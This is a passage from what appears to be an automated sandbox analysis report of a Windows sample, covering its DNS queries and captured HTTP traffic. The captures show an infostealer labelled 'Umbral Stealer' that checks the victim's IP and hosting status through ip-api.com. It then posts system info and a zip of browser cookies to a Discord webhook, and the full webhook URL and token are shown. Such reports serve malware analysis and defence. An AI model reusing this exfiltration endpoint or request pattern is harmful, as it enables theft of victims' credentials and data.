                                                Aug 5, 2024 15:44:51.440784931 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.441258907 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.441289902 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.441353083 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.441359997 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.441423893 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.441441059 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.441526890 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.441546917 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.441657066 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.441678047 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.441781044 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.441796064 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.441809893 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.441814899 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.441876888 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.441899061 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.441901922 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.441909075 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.441914082 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.441921949 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.441926956 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.441934109 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.441965103 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.441972971 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.441989899 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442007065 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442028999 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442040920 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442053080 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442061901 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442068100 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442071915 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442090988 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442101002 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442117929 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442125082 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442156076 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442162991 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442178965 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442188025 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442194939 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442198992 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442222118 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442228079 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442234039 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442239046 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442251921 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442257881 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442291975 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442301035 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442316055 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442322016 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442353010 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442361116 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442367077 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442372084 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442384005 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442388058 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442424059 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442430019 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442446947 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442452908 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442457914 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442461967 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442480087 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442485094 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442502022 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442509890 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442516088 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442519903 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.442549944 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442585945 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442596912 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442615032 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442646980 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442682981 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442718029 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442759037 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442796946 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.442838907 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.451961040 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.452297926 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.452332020 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.452358007 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.456990957 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:51.457075119 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:51.462876081 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:52.055568933 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:52.055663109 CEST44349741162.159.138.232192.168.2.4
                                                Aug 5, 2024 15:44:52.055730104 CEST49741443192.168.2.4162.159.138.232
                                                Aug 5, 2024 15:44:52.056494951 CEST49741443192.168.2.4162.159.138.232

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 5, 2024 15:43:49.049926996 CEST6193853192.168.2.41.1.1.1
                                                Aug 5, 2024 15:43:49.058039904 CEST53619381.1.1.1192.168.2.4
                                                Aug 5, 2024 15:44:26.739140034 CEST5803253192.168.2.41.1.1.1
                                                Aug 5, 2024 15:44:26.747137070 CEST53580321.1.1.1192.168.2.4
                                                Aug 5, 2024 15:44:50.092690945 CEST6468053192.168.2.41.1.1.1
                                                Aug 5, 2024 15:44:50.101758957 CEST53646801.1.1.1192.168.2.4

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Aug 5, 2024 15:43:49.049926996 CEST192.168.2.41.1.1.10x31b8Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                Aug 5, 2024 15:44:26.739140034 CEST192.168.2.41.1.1.10x43e6Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                Aug 5, 2024 15:44:50.092690945 CEST192.168.2.41.1.1.10x63fdStandard query (0)ptb.discord.comA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Aug 5, 2024 15:43:49.058039904 CEST1.1.1.1192.168.2.40x31b8No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                Aug 5, 2024 15:44:26.747137070 CEST1.1.1.1192.168.2.40x43e6No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                Aug 5, 2024 15:44:50.101758957 CEST1.1.1.1192.168.2.40x63fdNo error (0)ptb.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                Aug 5, 2024 15:44:50.101758957 CEST1.1.1.1192.168.2.40x63fdNo error (0)ptb.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                Aug 5, 2024 15:44:50.101758957 CEST1.1.1.1192.168.2.40x63fdNo error (0)ptb.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                Aug 5, 2024 15:44:50.101758957 CEST1.1.1.1192.168.2.40x63fdNo error (0)ptb.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                Aug 5, 2024 15:44:50.101758957 CEST1.1.1.1192.168.2.40x63fdNo error (0)ptb.discord.com162.159.136.232A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • ptb.discord.com
                                                • ip-api.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449731208.95.112.1807396C:\Users\user\Desktop\zamPeEkHWr.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 5, 2024 15:43:49.065330029 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                Host: ip-api.com
                                                Connection: Keep-Alive
                                                Aug 5, 2024 15:43:49.522703886 CEST175INHTTP/1.1 200 OK
                                                Date: Mon, 05 Aug 2024 13:43:48 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 6
                                                Access-Control-Allow-Origin: *
                                                X-Ttl: 60
                                                X-Rl: 44
                                                Data Raw: 66 61 6c 73 65 0a
                                                Data Ascii: false


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.449738208.95.112.1807396C:\Users\user\Desktop\zamPeEkHWr.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 5, 2024 15:44:26.756620884 CEST55OUTGET /json/?fields=225545 HTTP/1.1
                                                Host: ip-api.com
                                                Aug 5, 2024 15:44:27.241185904 CEST379INHTTP/1.1 200 OK
                                                Date: Mon, 05 Aug 2024 13:44:26 GMT
                                                Content-Type: application/json; charset=utf-8
                                                Content-Length: 202
                                                Access-Control-Allow-Origin: *
                                                X-Ttl: 22
                                                X-Rl: 43
                                                Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449740162.159.138.2324437396C:\Users\user\Desktop\zamPeEkHWr.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-05 13:44:50 UTC364OUTPOST /api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL HTTP/1.1
                                                Accept: application/json
                                                User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                Content-Type: application/json; charset=utf-8
                                                Host: ptb.discord.com
                                                Content-Length: 940
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-08-05 13:44:50 UTC25INHTTP/1.1 100 Continue
                                                2024-08-05 13:44:50 UTC940OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 36 30 39 32 39 30 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 37 31 34 33 34 44 35 36 2d 31 35 34 38 2d 45 44 33 44 2d 41 45 45 36 2d 43 37 35 41 45 43 44 39 33 42 46 30 5c 72 5c 6e 43 50 55 3a 20 49 6e
                                                Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 609290\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 71434D56-1548-ED3D-AEE6-C75AECD93BF0\r\nCPU: In
                                                2024-08-05 13:44:50 UTC1369INHTTP/1.1 404 Not Found
                                                Date: Mon, 05 Aug 2024 13:44:50 GMT
                                                Content-Type: application/json
                                                Content-Length: 45
                                                Connection: close
                                                set-cookie: __dcfduid=e33ff842533011efbe60b67178f48d0e; Expires=Sat, 04-Aug-2029 13:44:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                x-ratelimit-limit: 5
                                                x-ratelimit-remaining: 4
                                                x-ratelimit-reset: 1722865492
                                                x-ratelimit-reset-after: 1
                                                via: 1.1 google
                                                alt-svc: h3=":443"; ma=86400
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2BBBAmd1RrIzFLhMO%2FwUWja0FGraiAvZGXlrwzS2KQ53MD0Lgp4EP3CjS%2FtWQOs%2FYbSjtsPUYOKa07FSNWu1ss1eQYbjL5UQLrbSzehFLb%2FnfOo09q2D2J42vggM0O9VNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                X-Content-Type-Options: nosniff
                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                Set-Cookie: __sdcfduid=e33ff842533011efbe60b67178f48d0ebfbd2fc0e724b666922ca10fb71189111e3b4659a738b6f2d176e07ba6c3b9c8; Expires=Sat, 04-Aug-2029 13:44:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                Set-Cookie: __cfruid=2cb54a56125b2ec73133bde1a3ab9d05c16a5180-1722865490; path=/; domain=.discord.com; HttpOnly; Secure; Sam
                                                2024-08-05 13:44:50 UTC268INData Raw: 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 75 66 4b 42 42 35 41 46 78 49 59 75 5f 36 57 4a 33 2e 59 30 41 34 69 61 5a 5f 6d 30 43 4f 44 65 63 6d 37 78 6a 31 42 33 54 37 45 2d 31 37 32 32 38 36 35 34 39 30 38 30 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 61 65 37 33 39 36 34 39 62 30 32 34 31 65 31 2d 45 57 52 0d 0a 0d 0a 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22
                                                Data Ascii: eSite=NoneSet-Cookie: _cfuvid=ufKBB5AFxIYu_6WJ3.Y0A4iaZ_m0CODecm7xj1B3T7E-1722865490805-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ae739649b0241e1-EWR{"message": "Unknown Webhook", "


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.449741162.159.138.2324437396C:\Users\user\Desktop\zamPeEkHWr.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-05 13:44:51 UTC688OUTPOST /api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL HTTP/1.1
                                                Accept: application/json
                                                User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                Content-Type: multipart/form-data; boundary="dbf26cc2-51f7-478a-9bff-d23fc4e12861"
                                                Host: ptb.discord.com
                                                Cookie: __dcfduid=e33ff842533011efbe60b67178f48d0e; __sdcfduid=e33ff842533011efbe60b67178f48d0ebfbd2fc0e724b666922ca10fb71189111e3b4659a738b6f2d176e07ba6c3b9c8; __cfruid=2cb54a56125b2ec73133bde1a3ab9d05c16a5180-1722865490; _cfuvid=ufKBB5AFxIYu_6WJ3.Y0A4iaZ_m0CODecm7xj1B3T7E-1722865490805-0.0.1.1-604800000
                                                Content-Length: 654379
                                                Expect: 100-continue
                                                2024-08-05 13:44:51 UTC25INHTTP/1.1 100 Continue
                                                2024-08-05 13:44:51 UTC40OUTData Raw: 2d 2d 64 62 66 32 36 63 63 32 2d 35 31 66 37 2d 34 37 38 61 2d 39 62 66 66 2d 64 32 33 66 63 34 65 31 32 38 36 31 0d 0a
                                                Data Ascii: --dbf26cc2-51f7-478a-9bff-d23fc4e12861
                                                2024-08-05 13:44:51 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 36 30 39 32 39 30 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 36 30 39 32 39 30 2e 7a 69 70 0d 0a 0d 0a
                                                Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-609290.zip; filename*=utf-8''Umbral-609290.zip
                                                2024-08-05 13:44:51 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 8c 4d 05 59 7b ff df 9a dd 06 00 00 11 0d 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 c5 57 4b 8f 9b c8 1a 5d 13 29 7f 23 1b 8b 6e 8a aa 82 aa 45 2f 78 fb 81 6d 0c 7e 6f 5a 80 0b 1b 83 c1 3c 0c b6 35 ca 6f bf b4 33 c9 24 52 6e d2 d1 2c 86 05 08 89 3a 75 be c7 39 5f f1 b4 cf f3 7d ca 9e c2 fc c4 cd dd 85 c1 3d 73 a6 62 7b 06 07 20 c4 92 04 88 24 40 89 48 80 42 6e 32 d0 39 0c c0 cb 91 78 b3 c5 3c ad b3 e5 02 87 53 85 dd ee 85 77 5d f1 45 7f ea 27 ee 45 ed eb 33 cb 9e 5b 2c 64 1a dd e2 d2 bd 27 b8 2e c7 a3 00 69 97 ad f6 aa 99 a7 50 1e 99 ed 2c 74 87 36 5f 58 77 32 6e 92 e4 3e de 9e 8c b4 59 2b e6 ca 9e f2 73 67 4b 9d 71 a1 6e 14 99 6c 95 8b cf ce d9
                                                Data Ascii: PKMY{#Browsers\Cookies\Chrome Cookies.txtWK])#nE/xm~oZ<5o3$Rn,:u9_}=sb{ $@HBn29x<Sw]E'E3[,d'.iP,t6_Xw2n>Y+sgKqnl
                                                2024-08-05 13:44:51 UTC16355OUTData Raw: 5c ba 2a b9 cd 16 e0 73 13 ea 3a 4e 99 cb 67 23 98 fb c3 75 76 a2 53 24 5f 95 0c 6a 8f bf 3b e1 9a 74 e7 71 62 72 b3 6d fa c6 c2 5c fa ce 82 2b 93 53 89 7a 32 5e 45 7f e7 84 cb 75 b7 d1 1e 55 bf a3 b4 22 e3 13 74 04 3f cd d6 1b 6e 92 91 20 08 eb ba c9 64 22 28 96 a8 6a 20 d2 c1 cc 09 0a 1f 50 b6 3f 96 8d bf 53 9e 8b 67 1f ef cc 38 10 a6 1c a3 3c 75 04 a4 dc 0c b9 e3 c8 20 f0 1e 8b ea 7f 44 c9 01 d8 f1 9b d4 3b 2b 03 15 47 da 99 12 b8 8e b4 ea 0a ae 65 7a 35 76 b9 ef b2 b3 23 9f 59 ef 5b 0d 9b 7a 5e 29 25 07 be 33 9e 54 10 fd e2 8e aa c7 14 13 0f 69 e0 3d 05 e6 c3 46 32 75 13 cb ef 00 6c fa 38 87 a3 ff 1c 63 05 18 21 d8 ff 8e 91 75 7b 62 e8 bf 52 54 6b 96 97 7c 57 b7 31 39 c9 21 dc fb 81 4c b6 78 ea 0a 11 91 5f 8b f3 ca 19 86 71 fb ec 58 ce dd 7c 53 fd 51
                                                Data Ascii: \*s:Ng#uvS$_j;tqbrm\+Sz2^EuU"t?n d"(j P?Sg8<u D;+Gez5v#Y[z^)%3Ti=F2ul8c!u{bRTk|W19!Lx_qX|SQ
                                                2024-08-05 13:44:51 UTC16355OUTData Raw: 2b e3 00 58 44 f8 48 f2 18 eb a4 31 49 4f cd 38 ce 8a 6b 82 d8 14 78 73 0c c0 b6 e6 ca ef 8d 0b 96 1a b5 4b 09 4c 04 8a 54 b2 21 d9 01 00 7d 9b f7 8c 9e 49 3d ab be 91 d5 3b bb 4d bf d4 ce df 24 4f 09 6b 9d a1 b8 fd 18 e3 11 bc 3b 30 c4 2a 91 e6 6e eb 3a fb 16 e3 18 9e ae cc 46 6c 3f 74 3c 47 4e 71 16 42 19 99 b5 53 8f 40 5d b6 70 d3 0c 38 30 3d 5e 78 76 77 b6 7e e4 8c 80 64 ed bd 7e 47 e5 e6 3c 3d 01 e5 1d 2f 50 be 7a dd 70 7f a3 f3 db 64 71 36 c3 35 fc 79 d1 fa d7 2d 19 50 7e b1 f1 78 56 f1 96 12 d7 29 72 e6 20 8e ff a0 74 74 cc 95 b2 9d fd fc ae f3 8f fa cc 36 d0 93 da 82 94 c0 d7 4d de 76 b6 78 dc ce 91 4b 8b bf fe ae b7 32 2a de b2 de 46 af b0 5d 3a 30 1f ec 3a c4 d2 55 41 f9 22 a8 1b 0a ca 0f bd 6b 13 a1 45 55 e0 66 c5 75 c4 1a 02 50 59 6f 0a f7 9b
                                                Data Ascii: +XDH1IO8kxsKLT!}I=;M$Ok;0*n:Fl?t<GNqBS@]p80=^xvw~d~G<=/Pzpdq65y-P~xV)r tt6MvxK2*F]:0:UA"kEUfuPYo
                                                2024-08-05 13:44:51 UTC16355OUTData Raw: cf 81 ac 26 df 89 35 b6 54 4c 95 04 66 fe 0e 14 fb cb 30 f6 c3 6f d2 54 6e 74 de a4 c1 b7 d2 32 47 3d 42 ca 44 bc 70 7e 85 ac 1d e0 d4 8a de 76 d8 74 2b 93 35 e4 ba 95 77 15 a4 fb 49 44 f5 9c 63 2e 9f 7a 07 15 e3 61 5b c9 21 7c e6 0b b7 85 23 76 bc b5 e6 9a 3b ec dd a8 63 cf 6e 5b ac e8 41 d6 a1 00 0d 59 0d 26 2c d4 dd d1 13 8c 5b 74 7e 52 98 fd e1 83 4c 50 44 16 fa 19 75 d2 01 83 8a 12 c6 db 99 3d e9 30 9b c9 63 84 fc 73 ed aa 75 6e f4 d8 ee 58 e1 a3 85 41 dc c8 3a 2e e2 98 e3 5d eb 2f 97 42 b5 2a 0f c6 88 59 6e bf 19 d6 c7 51 76 81 ef dc ab 61 9b 7e d4 ae 1f d9 7e 7f 3d 49 d1 df 3b 0f 9a 6f a9 ac e7 c6 bb 60 a3 82 ee f7 d5 62 6a ae 95 23 72 ab 42 36 d9 8c a5 53 86 1e dc a1 33 a0 63 f7 82 bb 43 15 0e 8b a6 06 81 23 54 af 8a 4e 69 2c 67 d9 4d dd 68 f6 15
                                                Data Ascii: &5TLf0oTnt2G=BDp~vt+5wIDc.za[!|#v;cn[AY&,[t~RLPDu=0csunXA:.]/B*YnQva~~=I;o`bj#rB6S3cC#TNi,gMh
                                                2024-08-05 13:44:51 UTC16355OUTData Raw: 6c 08 52 54 3b 2c f1 a9 86 a2 dc d7 2e 0b 64 3d 62 45 5a cf 08 e3 bc 0f 5f b4 cb ee 0d 04 2b 11 07 eb 3e 57 7f 57 be 79 f8 f3 b5 70 25 c3 75 f1 75 a3 d7 bb ec 2b 56 b8 c6 93 fc bf 3d b7 1c 38 23 9c a3 fd 0f 98 8e 07 50 84 e2 e2 c6 1e de 84 13 7f 2c bf 7b 31 17 f3 6c 7d a1 c0 7f b5 ec c8 66 a7 ab 5f df 58 a0 47 88 27 da 85 35 a3 57 3b d1 d0 f7 11 f9 31 8f 24 22 30 9c cf 6a b7 91 9c b2 be 6e 9f f0 71 48 8f 03 8b 3e e9 5a ec e8 a4 5d 71 d3 25 4f 17 57 94 67 54 b5 4f 18 f9 97 02 a4 7c 9c 08 b4 e1 03 5e 8b 32 7f 91 7c 93 3f a3 1c 96 02 b6 c4 c6 03 e1 33 75 7d 04 6c 9e d1 2f 13 16 7e 05 1a ff b0 23 be 42 30 75 bd f6 ef 94 ac 30 b2 3a 37 ce 02 e9 a8 0c 4a ec 8e e6 89 ea d1 7f 4b bf 97 f8 5b 77 74 ff 45 f9 d3 cc 70 f3 f6 ee ac 43 83 bd e8 ee 27 9f da 02 49 1c 21
                                                Data Ascii: lRT;,.d=bEZ_+>WWyp%uu+V=8#P,{1l}f_XG'5W;1$"0jnqH>Z]q%OWgTO|^2|?3u}l/~#B0u0:7JK[wtEpC'I!
